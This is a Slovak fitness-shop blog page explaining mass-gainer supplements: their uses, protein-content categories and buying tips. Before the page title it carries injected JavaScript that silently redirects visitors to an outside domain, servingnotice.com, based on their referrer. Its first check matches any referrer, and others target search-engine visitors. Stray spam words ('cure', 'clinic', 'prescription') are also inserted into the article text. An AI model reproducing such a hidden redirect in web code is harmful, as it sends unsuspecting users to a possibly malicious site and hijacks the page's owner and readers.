var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Gainer- objemovo sacharidový doplnok výživy | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Gainer- objemovo sacharidový doplnok výživy

Gainer je objemový doplnok výživy, cure ktorý pomáha zvýšiť Váš objem. Obsahuje veľké percento sacharidov v jednej dávke. Slúžia na doplnenie energie a cukrov po tréningu. Je vhodný hlavne počas objemových tréningov a pre ektomorfov(majú problém pribrať).

Pre koho je gainer určený?

Pre ektomorfov z toho dôvodu, clinic že rýchlo spaľujú to čo zjedia. Po použití objemového prípravku menom gainer dostanete do seba veľké množstvo sacharidov, prescription ktoré vo Vašom tele ostanú a bude telo spaľovať tie. Takto môžu pribrať aj ektomorfy, ktorí s tým majú najväčší problém.

Pre ľudí, ktorí chcú rýchlo pribrať alebo vytrvalostných športovcov. Ak máte náročné tréningy tak gainer po tréningu je veľmi doporučený. Vaše telo počas tréningu spotrebovalo veľa energie a potrebuje ju doplniť. Ak nedostane dávku sacharidov, telo si bude brať energiu zo svalov a tukov. Takto budete chudnúť aj zo svalov a nedosiahnete svalové prírastky.

Ako gainer delíme?

Gainery delím podľa počtu bielkovín do 4 skupín.

 • do 10% bielkovín v gaineri
 • 11%-20% bielkovín v gaineri
 • 21%-30% bielkovín v gaineri
 • 31%-40% bielkovín v gaineri

Toto je percentuálne množstvo, ktoré sa nachádza v jednej dávke gaineru.

Ako si vyberieme najvhodnej gainerový nápoj?

Ak ste sa rozhodli vybrať nejaký gainer, doporučíme Vám ten správny.

Pre ľudí, ktorí začínajú cvičiť a majú problém pribrať, odporúčam gainer s obsahom bielkovín v jednej dávke 0-20%.

Ak chcete skutočnú kvalitu, zakúpte si gainer s obsahom bielkovín 20-40% pre kvalitné aminokyseliny, ktoré Vám pomôžu rýchlejšie regenerovať a budovať svalovú hmotu.

Ďalšou možnosťou je komplexný gainer, ktorý odporúčame pre pokročilejších cvičencov. S pravidelným cvičením 2-3 mesiace. V takomto objemovo-sacharidovom doplnku výživy sa nachádza veľké spektrum ďalších látok, ktoré podporujú zvýšenie rastu a objemu. Nachádza sa v tom väčšie množstvo aminokyselín, viaceré druhy keratínov, nitrixov a stimulantov.

Poslednou možnosťou, ktorú treba spomenúť je tkz. Gainer 50%-50%. Obsahuje veľké množstvo bielkovín aj sacharidov. Väčšinou sú tieto hodnoty rovnaké alebo skoro rovnaké. Takýto gainer slúži hlavne po tréningu, keď do tela chcete dostať bielkoviny pre kvalitu svalov a sacharidy pre rast svalov a doplnenie energie. Vhodný je aj ako náhrada jedla.

Čomu sa treba vyvarovať?

To najlacnejšie nie je aj to najlepšie. V lacných gaineroch sa nachádzajú hlavne jednoduché cukry ako fruktóza, glukóza, ktoré sa ihneď vstrebávajú do tela. Takého gainery sú vhodné hlavne pre ektomorfov, ktoré potrebujú prijať veľké množstvo sacharidov a nejde im o nejakú extra kvalitu. Keď máte eurá navyše, radšej kúpte kvalitnejší a to platí aj pre ektomorfov.

Vhodné je zakúpiť gainer, ktorý obsahuje polysacharidy a maltodextrín, ktoré sa dostavajú do tela postupne a zásobujú nás sacharidmi. Takýmto spôsobom sa menej cukrov uloží do tukov a viac využije ako doplnenie energie po tréningu i pre nové svalové prírastky.

Naše služby zahŕňajú aj doporučenie vhodnej doplnkovej výživy. Neváhaj a pozri to !

Diskusia (1)

  • rambo232
  • 26. Jún 2012 o 6:30

  Výborný článok :)

  Odpovedať

Pridať komentár
Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku